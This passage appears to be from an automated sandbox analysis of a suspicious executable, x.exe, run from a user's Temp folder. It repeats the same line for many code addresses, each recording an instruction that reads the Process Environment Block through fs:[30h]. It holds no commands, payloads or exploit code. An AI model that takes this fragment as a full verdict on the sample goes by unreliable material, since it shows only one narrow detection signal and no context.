            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144D070 mov ecx, dword ptr fs:[00000030h]7_2_0144D070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01454000 mov ecx, dword ptr fs:[00000030h]7_2_01454000
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FC073 mov eax, dword ptr fs:[00000030h]7_2_013FC073
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov ecx, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1070 mov eax, dword ptr fs:[00000030h]7_2_013E1070
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D2050 mov eax, dword ptr fs:[00000030h]7_2_013D2050
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB052 mov eax, dword ptr fs:[00000030h]7_2_013FB052
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149903E mov eax, dword ptr fs:[00000030h]7_2_0149903E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149903E mov eax, dword ptr fs:[00000030h]7_2_0149903E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149903E mov eax, dword ptr fs:[00000030h]7_2_0149903E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149903E mov eax, dword ptr fs:[00000030h]7_2_0149903E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144D0C0 mov eax, dword ptr fs:[00000030h]7_2_0144D0C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144D0C0 mov eax, dword ptr fs:[00000030h]7_2_0144D0C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A50D9 mov eax, dword ptr fs:[00000030h]7_2_014A50D9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014520DE mov eax, dword ptr fs:[00000030h]7_2_014520DE
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D5096 mov eax, dword ptr fs:[00000030h]7_2_013D5096
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FD090 mov eax, dword ptr fs:[00000030h]7_2_013FD090
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FD090 mov eax, dword ptr fs:[00000030h]7_2_013FD090
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CD08D mov eax, dword ptr fs:[00000030h]7_2_013CD08D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014120F0 mov ecx, dword ptr fs:[00000030h]7_2_014120F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D208A mov eax, dword ptr fs:[00000030h]7_2_013D208A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CC0F0 mov eax, dword ptr fs:[00000030h]7_2_013CC0F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D80E9 mov eax, dword ptr fs:[00000030h]7_2_013D80E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F50E4 mov eax, dword ptr fs:[00000030h]7_2_013F50E4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F50E4 mov ecx, dword ptr fs:[00000030h]7_2_013F50E4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140909C mov eax, dword ptr fs:[00000030h]7_2_0140909C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CA0E3 mov ecx, dword ptr fs:[00000030h]7_2_013CA0E3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F90DB mov eax, dword ptr fs:[00000030h]7_2_013F90DB
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014960B8 mov eax, dword ptr fs:[00000030h]7_2_014960B8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014960B8 mov ecx, dword ptr fs:[00000030h]7_2_014960B8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov ecx, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov ecx, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov ecx, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov ecx, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C0 mov eax, dword ptr fs:[00000030h]7_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A5341 mov eax, dword ptr fs:[00000030h]7_2_014A5341
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C7330 mov eax, dword ptr fs:[00000030h]7_2_013C7330
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01452349 mov eax, dword ptr fs:[00000030h]7_2_01452349
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FF32A mov eax, dword ptr fs:[00000030h]7_2_013FF32A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145035C mov eax, dword ptr fs:[00000030h]7_2_0145035C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145035C mov eax, dword ptr fs:[00000030h]7_2_0145035C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145035C mov eax, dword ptr fs:[00000030h]7_2_0145035C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145035C mov ecx, dword ptr fs:[00000030h]7_2_0145035C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145035C mov eax, dword ptr fs:[00000030h]7_2_0145035C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145035C mov eax, dword ptr fs:[00000030h]7_2_0145035C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149A352 mov eax, dword ptr fs:[00000030h]7_2_0149A352
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CC310 mov ecx, dword ptr fs:[00000030h]7_2_013CC310
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148F367 mov eax, dword ptr fs:[00000030h]7_2_0148F367
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F0310 mov ecx, dword ptr fs:[00000030h]7_2_013F0310
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147437C mov eax, dword ptr fs:[00000030h]7_2_0147437C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140A30B mov eax, dword ptr fs:[00000030h]7_2_0140A30B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140A30B mov eax, dword ptr fs:[00000030h]7_2_0140A30B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140A30B mov eax, dword ptr fs:[00000030h]7_2_0140A30B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D7370 mov eax, dword ptr fs:[00000030h]7_2_013D7370
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D7370 mov eax, dword ptr fs:[00000030h]7_2_013D7370
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D7370 mov eax, dword ptr fs:[00000030h]7_2_013D7370
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145930B mov eax, dword ptr fs:[00000030h]7_2_0145930B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145930B mov eax, dword ptr fs:[00000030h]7_2_0145930B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145930B mov eax, dword ptr fs:[00000030h]7_2_0145930B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149132D mov eax, dword ptr fs:[00000030h]7_2_0149132D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149132D mov eax, dword ptr fs:[00000030h]7_2_0149132D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C9353 mov eax, dword ptr fs:[00000030h]7_2_013C9353
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C9353 mov eax, dword ptr fs:[00000030h]7_2_013C9353
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CD34C mov eax, dword ptr fs:[00000030h]7_2_013CD34C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CD34C mov eax, dword ptr fs:[00000030h]7_2_013CD34C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148C3CD mov eax, dword ptr fs:[00000030h]7_2_0148C3CD
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148B3D0 mov ecx, dword ptr fs:[00000030h]7_2_0148B3D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F33A5 mov eax, dword ptr fs:[00000030h]7_2_013F33A5
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C8397 mov eax, dword ptr fs:[00000030h]7_2_013C8397
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C8397 mov eax, dword ptr fs:[00000030h]7_2_013C8397
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C8397 mov eax, dword ptr fs:[00000030h]7_2_013C8397
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148F3E6 mov eax, dword ptr fs:[00000030h]7_2_0148F3E6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F438F mov eax, dword ptr fs:[00000030h]7_2_013F438F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F438F mov eax, dword ptr fs:[00000030h]7_2_013F438F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CE388 mov eax, dword ptr fs:[00000030h]7_2_013CE388
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CE388 mov eax, dword ptr fs:[00000030h]7_2_013CE388
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CE388 mov eax, dword ptr fs:[00000030h]7_2_013CE388
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A53FC mov eax, dword ptr fs:[00000030h]7_2_014A53FC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014063FF mov eax, dword ptr fs:[00000030h]7_2_014063FF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EE3F0 mov eax, dword ptr fs:[00000030h]7_2_013EE3F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EE3F0 mov eax, dword ptr fs:[00000030h]7_2_013EE3F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EE3F0 mov eax, dword ptr fs:[00000030h]7_2_013EE3F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A539D mov eax, dword ptr fs:[00000030h]7_2_014A539D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E03E9 mov eax, dword ptr fs:[00000030h]7_2_013E03E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E03E9 mov eax, dword ptr fs:[00000030h]7_2_013E03E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E03E9 mov eax, dword ptr fs:[00000030h]7_2_013E03E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E03E9 mov eax, dword ptr fs:[00000030h]7_2_013E03E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E03E9 mov eax, dword ptr fs:[00000030h]7_2_013E03E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E03E9 mov eax, dword ptr fs:[00000030h]7_2_013E03E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E03E9 mov eax, dword ptr fs:[00000030h]7_2_013E03E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E03E9 mov eax, dword ptr fs:[00000030h]7_2_013E03E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0142739A mov eax, dword ptr fs:[00000030h]7_2_0142739A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0142739A mov eax, dword ptr fs:[00000030h]7_2_0142739A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014033A0 mov eax, dword ptr fs:[00000030h]7_2_014033A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014033A0 mov eax, dword ptr fs:[00000030h]7_2_014033A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA3C0 mov eax, dword ptr fs:[00000030h]7_2_013DA3C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA3C0 mov eax, dword ptr fs:[00000030h]7_2_013DA3C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA3C0 mov eax, dword ptr fs:[00000030h]7_2_013DA3C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA3C0 mov eax, dword ptr fs:[00000030h]7_2_013DA3C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA3C0 mov eax, dword ptr fs:[00000030h]7_2_013DA3C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DA3C0 mov eax, dword ptr fs:[00000030h]7_2_013DA3C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D83C0 mov eax, dword ptr fs:[00000030h]7_2_013D83C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D83C0 mov eax, dword ptr fs:[00000030h]7_2_013D83C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D83C0 mov eax, dword ptr fs:[00000030h]7_2_013D83C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D83C0 mov eax, dword ptr fs:[00000030h]7_2_013D83C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C823B mov eax, dword ptr fs:[00000030h]7_2_013C823B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140724D mov eax, dword ptr fs:[00000030h]7_2_0140724D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148B256 mov eax, dword ptr fs:[00000030h]7_2_0148B256
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148B256 mov eax, dword ptr fs:[00000030h]7_2_0148B256
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149D26B mov eax, dword ptr fs:[00000030h]7_2_0149D26B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149D26B mov eax, dword ptr fs:[00000030h]7_2_0149D26B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01411270 mov eax, dword ptr fs:[00000030h]7_2_01411270
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01411270 mov eax, dword ptr fs:[00000030h]7_2_01411270
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480274 mov eax, dword ptr fs:[00000030h]7_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01407208 mov eax, dword ptr fs:[00000030h]7_2_01407208
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01407208 mov eax, dword ptr fs:[00000030h]7_2_01407208
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F9274 mov eax, dword ptr fs:[00000030h]7_2_013F9274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C826B mov eax, dword ptr fs:[00000030h]7_2_013C826B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D4260 mov eax, dword ptr fs:[00000030h]7_2_013D4260
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D4260 mov eax, dword ptr fs:[00000030h]7_2_013D4260
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D4260 mov eax, dword ptr fs:[00000030h]7_2_013D4260
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D6259 mov eax, dword ptr fs:[00000030h]7_2_013D6259
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CA250 mov eax, dword ptr fs:[00000030h]7_2_013CA250
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A5227 mov eax, dword ptr fs:[00000030h]7_2_014A5227
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C9240 mov eax, dword ptr fs:[00000030h]7_2_013C9240
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C9240 mov eax, dword ptr fs:[00000030h]7_2_013C9240
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E02A0 mov eax, dword ptr fs:[00000030h]7_2_013E02A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E02A0 mov eax, dword ptr fs:[00000030h]7_2_013E02A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E52A0 mov eax, dword ptr fs:[00000030h]7_2_013E52A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E52A0 mov eax, dword ptr fs:[00000030h]7_2_013E52A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E52A0 mov eax, dword ptr fs:[00000030h]7_2_013E52A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E52A0 mov eax, dword ptr fs:[00000030h]7_2_013E52A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED mov eax, dword ptr fs:[00000030h]7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A52E2 mov eax, dword ptr fs:[00000030h]7_2_014A52E2
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148F2F8 mov eax, dword ptr fs:[00000030h]7_2_0148F2F8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C92FF mov eax, dword ptr fs:[00000030h]7_2_013C92FF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E284 mov eax, dword ptr fs:[00000030h]7_2_0140E284
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E284 mov eax, dword ptr fs:[00000030h]7_2_0140E284
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01450283 mov eax, dword ptr fs:[00000030h]7_2_01450283
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01450283 mov eax, dword ptr fs:[00000030h]7_2_01450283
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01450283 mov eax, dword ptr fs:[00000030h]7_2_01450283
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A5283 mov eax, dword ptr fs:[00000030h]7_2_014A5283
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140329E mov eax, dword ptr fs:[00000030h]7_2_0140329E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140329E mov eax, dword ptr fs:[00000030h]7_2_0140329E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E02E1 mov eax, dword ptr fs:[00000030h]7_2_013E02E1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E02E1 mov eax, dword ptr fs:[00000030h]7_2_013E02E1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E02E1 mov eax, dword ptr fs:[00000030h]7_2_013E02E1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014662A0 mov eax, dword ptr fs:[00000030h]7_2_014662A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014662A0 mov ecx, dword ptr fs:[00000030h]7_2_014662A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014662A0 mov eax, dword ptr fs:[00000030h]7_2_014662A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014662A0 mov eax, dword ptr fs:[00000030h]7_2_014662A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014662A0 mov eax, dword ptr fs:[00000030h]7_2_014662A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014662A0 mov eax, dword ptr fs:[00000030h]7_2_014662A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014672A0 mov eax, dword ptr fs:[00000030h]7_2_014672A0
